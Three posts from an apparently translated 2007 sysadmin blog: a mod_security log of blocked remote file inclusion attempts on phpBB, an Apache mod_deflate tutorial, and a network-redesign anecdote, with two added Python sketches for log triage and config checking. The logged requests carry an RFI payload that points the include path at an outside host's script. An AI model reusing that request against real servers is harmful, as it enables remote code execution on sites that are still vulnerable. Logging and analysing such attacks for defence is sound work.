When Script Kiddies Attack

28 10 2007

Wahh…… classes have started again (even though I rarely go to class :D ). Hmm, this server was left alone for about a week while I went home, and hahaha, there are so many logs.. tons of them!!!! Hahaha, it really is my own stupidity: I forgot to set up a crontab to rotate all those logs. Yesterday I looked at the web server log (the mod_security log), and oh man, there was a crazy amount!!!!! Reading it made my head spin………

Judging from the logs, on average an attack happens once every 15 minutes, ranging from spam to RFI and LFI.. hmmm……… here is a small piece of the log (RFI):

==953aa80c==============================
Request: xxxxx.xxxxxx.x.x 72.149.42.126 - - [24/Oct/2007:23:30:33 +0700] "GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxxx.xxxx.xxxxx
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: "8576a-549-d1366cc0;628b3780"
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
--953aa80c--

==7b81d714==============================
Request: xxxxx.xxxxx.x.x 72.149.42.126 - - [24/Oct/2007:23:30:34 +0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxx.xxxxx.x.x
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: "8576a-549-d1366cc0;62e80900"
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
--7b81d714--

(xxxxx.xxxxx.x.x has been deliberately obscured)

That is only a small part of the log……. if I dumped all of it here, whoever reads it would drop dead -______________-.

But the rather annoying part is the rules for blocking spam. Wow, it's crazy, there are so many log entries from spam; some get blocked, some still keep slipping through -______________-.

It turns out securing a web application is harder than securing the other things -______-
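A triage sketch for audit-log entries in the layout shown above, added here as an example and not part of the original post: it flags requests whose query parameters carry an absolute remote URL (the RFI pattern in the sample) and records whether mod_security denied them. The sample entries are constructed and abridged, and treating a missing mod_security-action line as "not denied" is an assumption.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed, abridged entries in the audit-log layout shown above; hosts and
# addresses are documentation placeholders, not real traffic.
SAMPLE = '''==aaaa0001==============================
Request: www.example.test 192.0.2.10 - - [24/Oct/2007:23:30:33 +0700] "GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://files.example.invalid/a.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
mod_security-action: 500
--aaaa0001--
==aaaa0002==============================
Request: www.example.test 192.0.2.10 - - [24/Oct/2007:23:45:02 +0700] "GET /index.php?page=ftp%3A%2F%2Ffiles.example.invalid%2Fb.txt HTTP/1.1" 200 5120 "-" "libwww-perl/5.65" - "-"
----------------------------------------
mod_security-message: Warning. Pattern match "libwww-perl" at HTTP_USER_AGENT
--aaaa0002--
==aaaa0003==============================
Request: www.example.test 198.51.100.7 - - [24/Oct/2007:23:50:11 +0700] "GET /index.php?page=news HTTP/1.1" 200 812 "-" "Mozilla/5.0" - "-"
----------------------------------------
--aaaa0003--
'''

ENTRY = re.compile(r'^==([0-9a-f]{8})=+\n(.*?)^--\1--$', re.M | re.S)
REQ = re.compile(r'^Request: \S+ (\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ', re.M)
ACTION = re.compile(r'^mod_security-action: (\d{3})$', re.M)

def remote_params(uri):
    """Names of query parameters whose decoded value is an absolute remote URL."""
    pairs = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
    return [k for k, v in pairs if re.match(r'(?i)(https?|ftp)://', v)]

def triage(log_text):
    """Return (hits, per_ip): one dict per RFI-looking entry, plus counts by source."""
    hits, per_ip = [], Counter()
    for entry_id, body in ENTRY.findall(log_text):
        req = REQ.search(body)
        params = remote_params(req.group(3)) if req else []
        if not params:
            continue
        ip, when, _, status = req.groups()
        # Assumption: an entry without a mod_security-action line was not denied.
        blocked = ACTION.search(body) is not None
        hits.append(dict(id=entry_id, ip=ip, time=when, params=params,
                         status=status, blocked=blocked))
        per_ip[ip] += 1
    return hits, per_ip

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Entries that come back with blocked set to False and a 200 status are the ones to review first, since they matched the remote-URL pattern but no rule denied them.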





speed up your apache web access with mod_deflate

10 10 2007

mod_deflate?? What is that? According to the Apache documentation, mod_deflate is a module that provides the DEFLATE output filter, which allows output from your web server to be compressed before it is sent to the client over the network. mod_deflate is an additional module in Apache. Enabling or disabling it is up to you, but I recommend enabling it. How to activate the module is explained in this post. Just wait and continue reading :p

mod_deflate was formerly known as mod_gzip (in Apache 1.3). Some advantages of using mod_deflate:

  1. Minimize the bandwidth output from a website.
  2. Decrease the amount of time and data transmitted over the network, resulting in faster web access and downloads for the client.

Next, I will explain how to activate mod_deflate in httpd-2.2.x. In this case (my server), Apache was installed from source (compiled manually), mod_deflate is disabled :( , php-mysql is enabled, mod_security is loaded as an additional Apache module, and of course it runs FreeBSD!!!!! Activating the mod_deflate module is very simple, just follow these steps:

  • First, locate mod_deflate.c, then go to the directory that contains the mod_deflate.c file.
  • Run path_to_apache_/bin/apxs -cia mod_deflate.c (if you get no errors, congratulations, you have activated the mod_deflate module). To make sure the module has been installed, check your httpd.conf: if you see the line "LoadModule deflate_module modules/mod_deflate.so", mod_deflate has been installed.

heheheheh……….. we are not finished yet. Buy some cigarettes first. heheheheheh lol lol lol lol..

Okay, now the most interesting part: adding mod_deflate rules to your httpd.conf. Open your httpd.conf and add these lines to the Directory block for your document root path:

<Directory "/web/wiw">
    # ……….. (existing directives)
    AddOutputFilterByType DEFLATE text/plain
    AddOutputFilterByType DEFLATE text/xml
    AddOutputFilterByType DEFLATE text/html
    AddOutputFilterByType DEFLATE application/xhtml+xml
    AddOutputFilterByType DEFLATE text/css
    AddOutputFilterByType DEFLATE application/xml
    AddOutputFilterByType DEFLATE application/x-javascript
    AddOutputFilterByType DEFLATE application/x-httpd-php
</Directory>

Save and close your httpd.conf file, then restart Apache………
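A local check for the two things the steps above change in httpd.conf, added here as an example and not part of the original post: whether the deflate_module LoadModule line is present, and which MIME types each Directory block sends through DEFLATE. The sample configuration is constructed ("/web/wiw" is the page's document root, "/web/other" is hypothetical), and the function names are this example's own.

```python
import re

# Constructed httpd.conf fragment; "/web/other" is a hypothetical second
# directory used to show that non-DEFLATE filters are not reported.
SAMPLE_CONF = '''
LoadModule deflate_module modules/mod_deflate.so
<Directory "/web/wiw">
    AddOutputFilterByType DEFLATE text/plain
    AddOutputFilterByType DEFLATE text/html text/css
    # AddOutputFilterByType DEFLATE application/xml
</Directory>
<Directory "/web/other">
    AddOutputFilterByType INCLUDES text/html
</Directory>
'''

def deflate_report(conf_text):
    """Return (module_loaded, {directory: [MIME types sent through DEFLATE]})."""
    loaded, scope, by_dir = False, ["(server)"], {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or commented-out directive
        opened = re.match(r'<Directory\s+"?([^">]+)"?\s*>$', line, re.I)
        if opened:
            scope.append(opened.group(1))
        elif re.match(r'</Directory>$', line, re.I):
            if len(scope) > 1:
                scope.pop()
        elif re.match(r'LoadModule\s+deflate_module\s', line, re.I):
            loaded = True
        else:
            words = line.split()
            # The filter argument may be a chain such as INCLUDES;DEFLATE.
            if (len(words) > 2 and words[0].lower() == "addoutputfilterbytype"
                    and "DEFLATE" in words[1].upper().split(";")):
                by_dir.setdefault(scope[-1], []).extend(words[2:])
    return loaded, by_dir

def missing_types(conf_text, directory, wanted):
    """MIME types from `wanted` that `directory` does not compress."""
    loaded, by_dir = deflate_report(conf_text)
    have = set(by_dir.get(directory, [])) if loaded else set()
    return sorted(set(wanted) - have)

if __name__ == "__main__":
    print(deflate_report(SAMPLE_CONF))
```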

If you want to see the output benchmark, go to this URL: http://www.whatsmyip.org/mod_gzip_test/

mod_deflate enabled

This tutorial only gives you simple mod_deflate rules……..

hehehehhe…… happy research……….





spaghetti networks

7 10 2007

hohohoho…………. what's wrong with the title??? It turns out blogging in English is tiring too……….. :D   :D   :D

hehe……… these past few weeks I have been going back and forth to stt-stmb a lot….. I swear it is really exhausting!!!!! Not enough sleep at night, sleeping 2 – 3 hours, leaving at 8………….. arrrggggghhhhhh!!!!! crazy!!! Well…….. that's the risk. The contract is already signed….. (finally I can earn my own money). Hmm………. but it is also fun there, I got work that can really upgrade my knowledge. Re-planning the networks !!!! I swear, I am really happy to get a job like that…… At first I was only offered the role of security auditor for their website. hahahahahah…………… crazy!!!!!!!!!!!!!!! At first I thought it over, whether to take the job there, ah….. but fine, I just made up my mind to take the job. hehehehehe…… to add to my CV, bro….

As soon as I arrived, okay, I finished my work. Check the web, reconfigure the firewall, add URL filtering, look at the logs…… suddenly, my boss asked for more: reconfigure the network while I was at it. What?????!!!!!! I was actually surprised too….. but that is the good part, man, my dream of building a big network came true!!!!!! hahahahaha, bragging a little is okay, right :D :D :D

When I first saw the network diagram, I was kind of surprised + shocked. How can a network be this wrecked (it's enough that only I know……… :D   :D   )!!!!!! In my heart I just blurted out, "how is this admin so stupid, there is no documentation". Damn…………

So, in the end I told the boss, "Boss, it looks like it really has to be reconfigured." The boss finally agreed, and I was told to make the network diagram. Alright!!!! With half-sleepy eyes…. I made the diagram. hahahahaha, since I had not slept the night before, it turned out a mess. Hmmmm, in the end I took the work home. While broadcasting on the radio (stress relief), I redid the network scheme. Finished!! Then I gave it to the boss: "Boss, here is the new network scheme." 2 ISP providers for the stmb network. hohohoho…. the boss seemed to just nod along……. then the boss asked for more strange things. Some of the servers use Windows 2003 Server + Lotus Domino……….. whattt???!!!!!!!! Damn! I have never handled Win 2003 Server, let alone Lotus Domino -_____-… huuuuuhhh, it's fine, I'll learn along the way….

After that, the boss said "what do you need??" hehehe…….. I just asked for 2 computers for proxies. Approved. What made me a bit puzzled + surprised was that the boss asked for a dedicated firewall box. A hardware firewall……. hahahahaha, I'm confused. PF or iptables can do it, why buy something expensive???? I was told to choose a hardware firewall…… Cisco PIX, SonicWall, or Juniper?? Ouch…….. /me is not used to handling any of the three -__________-, better to just use PF !!!!!!

I can gain a lot of knowledge working there!!! Lots of new things… and the girls there are also "awesoooooome!!!!!" haahahhahahahahaha it's great all around!!!

Starting to reconfigure the spaghetti networks from now!!!!!!!!!!